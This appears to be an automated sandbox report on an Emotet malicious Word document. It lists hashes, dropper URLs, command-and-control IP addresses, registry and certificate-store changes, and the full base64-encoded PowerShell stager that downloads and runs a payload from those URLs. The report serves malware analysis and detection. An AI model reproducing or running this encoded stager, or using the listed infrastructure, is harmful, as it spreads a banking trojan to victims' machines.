emotet | 186ec909dc32c982ab4bd6b257bb25a2726df856d4cf6c829e06683c352c92b2

General

Target

Form.doc
Size

260KB
MD5

c2b48d21764b195fb0ebbdd3d1bdd89a
SHA1

d8ca2aaba616f0281255a10634b6c4e17bb59336
SHA256

186ec909dc32c982ab4bd6b257bb25a2726df856d4cf6c829e06683c352c92b2
SHA512

c975a51bcf4cef1c345fcdadc59bd6b78ceeb96179b1c9621ef6070848f8452d8235b1d66223154edc7106cbe5d800e538a436c51e09f3828bf801849f740705

Score

10^/10

trojan banker emotet evasion spyware

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://adamwilt15.com/wp-content/INy1yG/

exe.dropper

https://ansu.or.jp/wp-includes/Requests/wEX/

exe.dropper

https://megafitsupplements.com/wp-admin/V5f4VC/

exe.dropper

https://www.kaiwangdian.com/wp-includes/Hz/

exe.dropper

https://vfxcool.com/wp-includes/Pkw/

Extracted

Family

emotet

C2

71.126.247.90:80

98.239.119.52:80

80.86.91.91:8080

104.236.28.47:8080

47.155.214.239:443

180.92.239.110:8080

87.106.136.232:8080

76.104.80.47:80

173.16.62.227:80

92.222.216.44:8080

47.153.183.211:80

74.130.83.133:80

47.156.70.145:80

110.36.217.66:8080

160.16.215.66:8080

200.116.145.225:443

181.13.24.82:80

24.94.237.248:80

5.32.55.214:80

31.172.240.91:8080

rsa_pubkey.plain

Signatures

Blacklisted process makes network request 4 IoCs

Processes:

PoWERsheLL.exe

flow pid process

2 1256 PoWERsheLL.exe
4 1256 PoWERsheLL.exe
6 1256 PoWERsheLL.exe
8 1256 PoWERsheLL.exe
Suspicious behavior: EmotetMutantsSpam 2 IoCs

Processes:

270.exeipsmsnap.exe

pid process

744 270.exe
1652 ipsmsnap.exe
Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

flow	pid	process
2	1256	PoWERsheLL.exe
4	1256	PoWERsheLL.exe
6	1256	PoWERsheLL.exe
8	1256	PoWERsheLL.exe

pid	process
744	270.exe
1652	ipsmsnap.exe

Drops file in System32 directory 2 IoCs

Processes:

PoWERsheLL.exe270.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PoWERsheLL.exe
File renamed	C:\Users\Admin\270.exe => C:\Windows\SysWOW64\ipsmsnap\ipsmsnap.exe	270.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

PoWERsheLL.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	PoWERsheLL.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d0020005200310000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	PoWERsheLL.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e210f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d0020005200310000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	PoWERsheLL.exe

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

PoWERsheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1256	1088	PoWERsheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

PoWERsheLL.exe

description pid process

Token: SeDebugPrivilege 1256 PoWERsheLL.exe
Executes dropped EXE 2 IoCs

Processes:

270.exeipsmsnap.exe

pid process

744 270.exe
1652 ipsmsnap.exe

description	pid	process
Token: SeDebugPrivilege	1256	PoWERsheLL.exe

pid	process
744	270.exe
1652	ipsmsnap.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

270.exe

description	pid	process	target process
PID 744 wrote to memory of 1652	744	270.exe	ipsmsnap.exe
PID 744 wrote to memory of 1652	744	270.exe	ipsmsnap.exe
PID 744 wrote to memory of 1652	744	270.exe	ipsmsnap.exe
PID 744 wrote to memory of 1652	744	270.exe	ipsmsnap.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1984 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

PoWERsheLL.exeipsmsnap.exe

pid process

1256 PoWERsheLL.exe
1256 PoWERsheLL.exe
1652 ipsmsnap.exe
1652 ipsmsnap.exe
Office loads VBA resources, possible macro or embedded object present

pid	process
1984	WINWORD.EXE

pid	process
1256	PoWERsheLL.exe
1256	PoWERsheLL.exe
1652	ipsmsnap.exe
1652	ipsmsnap.exe

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{2E43FBC0-0A8F-43B5-B4E0-E88D18CC665F}\2.0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\TypeLib	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{2E43FBC0-0A8F-43B5-B4E0-E88D18CC665F}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\TypeLib\{2E43FBC0-0A8F-43B5-B4E0-E88D18CC665F}\2.0\FLAGS\ = "6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{2E43FBC0-0A8F-43B5-B4E0-E88D18CC665F}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{2E43FBC0-0A8F-43B5-B4E0-E88D18CC665F}\2.0\FLAGS	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\TypeLib\{2E43FBC0-0A8F-43B5-B4E0-E88D18CC665F}\2.0\0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE270.exeipsmsnap.exe

pid process

1984 WINWORD.EXE
1984 WINWORD.EXE
744 270.exe
1652 ipsmsnap.exe

pid	process
1984	WINWORD.EXE
1984	WINWORD.EXE
744	270.exe
1652	ipsmsnap.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Form.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
PoWERsheLL -e JABHAGYAaAByAG0AaABzAHMAcQBxAGkAaQBnAD0AJwBCAHIAdABmAHcAcABjAGcAYgBjACcAOwAkAFAAcQBiAGEAawBjAHUAawBpAHUAcQAgAD0AIAAnADIANwAwACcAOwAkAEkAbQBnAHoAYgBvAGQAbABoAD0AJwBVAHIAeQB6AGEAdAByAGQAcQBsACcAOwAkAFoAcwB1AGIAcQB5AG8AagBxAG8AdwB6AGIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFAAcQBiAGEAawBjAHUAawBpAHUAcQArACcALgBlAHgAZQAnADsAJABCAGwAYgBqAGUAegBmAHAAZgBtAG8APQAnAEsAaQBoAHIAagB4AHQAbQAnADsAJABKAGIAaQBlAHkAdQBiAHcAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBlAGIAYwBsAEkAZQBuAHQAOwAkAEQAZgB5AGMAbAB2AGQAZABzAGwAawBzAHoAPQAnAGgAdAB0AHAAOgAvAC8AYQBkAGEAbQB3AGkAbAB0ADEANQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEkATgB5ADEAeQBHAC8AKgBoAHQAdABwAHMAOgAvAC8AYQBuAHMAdQAuAG8AcgAuAGoAcAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFIAZQBxAHUAZQBzAHQAcwAvAHcARQBYAC8AKgBoAHQAdABwAHMAOgAvAC8AbQBlAGcAYQBmAGkAdABzAHUAcABwAGwAZQBtAGUAbgB0AHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFYANQBmADQAVgBDAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBrAGEAaQB3AGEAbgBnAGQAaQBhAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEgAegAvACoAaAB0AHQAcABzADoALwAvAHYAZgB4AGMAbwBvAGwALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFAAawB3AC8AJwAuACIAUwBwAGAAbABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABFAHIAYwBmAGkAawBkAGUAcwB5AD0AJwBPAGEAZgB6AG0AYwBwAGcAaAAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwB6AHEAbwBzAGcAZwBnAHMAdwBkAGQAIABpAG4AIAAkAEQAZgB5AGMAbAB2AGQAZABzAGwAawBzAHoAKQB7AHQAcgB5AHsAJABKAGIAaQBlAHkAdQBiAHcALgAiAGQAbwBXAE4AbABvAGAAQQBkAGYAYABpAGwAZQAiACgAJABXAHoAcQBvAHMAZwBnAGcAcwB3AGQAZAAsACAAJABaAHMAdQBiAHEAeQBvAGoAcQBvAHcAegBiACkAOwAkAFYAcQBrAGoAbQBoAG8AcABkAHUAYQA9ACcAQgB0AHcAZQBjAGkAdgBsAGkAZQB1AGgAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABaAHMAdQBiAHEAeQBvAGoAcQBvAHcAegBiACkALgAiAGwAYABFAE4ARwBUAEgAIgAgAC0AZwBlACAAMgA5ADYANQA3ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAFIAYABFAEEAVABlACIAKAAkAFoAcwB1AGIAcQB5AG8AagBxAG8AdwB6AGIAKQA7ACQAUgB3AGEAZABiAGQAaABwAHkAYgA9ACcARQBpAHIAbABuAGQAbQB4AHMAZgBsAGQAeQAnADsAYgByAGUAYQBrADsAJABNAGwAcABjAHoAeABjAHkAPQAnAFcAdQBwAHQAZAB4AGQAbABsAHEAYwByACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAegBtAHMAbABsAHgAZgB0AD0AJwBFAGoAeQByAHoAYgBrAGsAcwBxAGkAeAAnAA==
1⤵
- Blacklisted process makes network request
- Drops file in System32 directory
- Modifies system certificate store
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1256

C:\Users\Admin\270.exe
C:\Users\Admin\270.exe
1⤵
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:744

C:\Windows\SysWOW64\ipsmsnap\ipsmsnap.exe
"C:\Windows\SysWOW64\ipsmsnap\ipsmsnap.exe"
2⤵
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1652

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\270.exe

Download Submit
C:\Users\Admin\270.exe

Download Submit
C:\Windows\SysWOW64\ipsmsnap\ipsmsnap.exe

Download Submit
memory/744-11-0x0000000000370000-0x000000000037C000-memory.dmp

Filesize
48KB

Download
memory/744-12-0x0000000000400000-0x00000000004F7000-memory.dmp

Filesize
988KB

Download
memory/1652-14-0x00000000001F0000-0x00000000001FC000-memory.dmp

Filesize
48KB

Download
memory/1652-15-0x0000000000400000-0x00000000004F7000-memory.dmp

Filesize
988KB

Download
memory/1984-2-0x00000000089E0000-0x00000000089E4000-memory.dmp

Filesize
16KB

Download
memory/1984-3-0x0000000006F00000-0x0000000007100000-memory.dmp

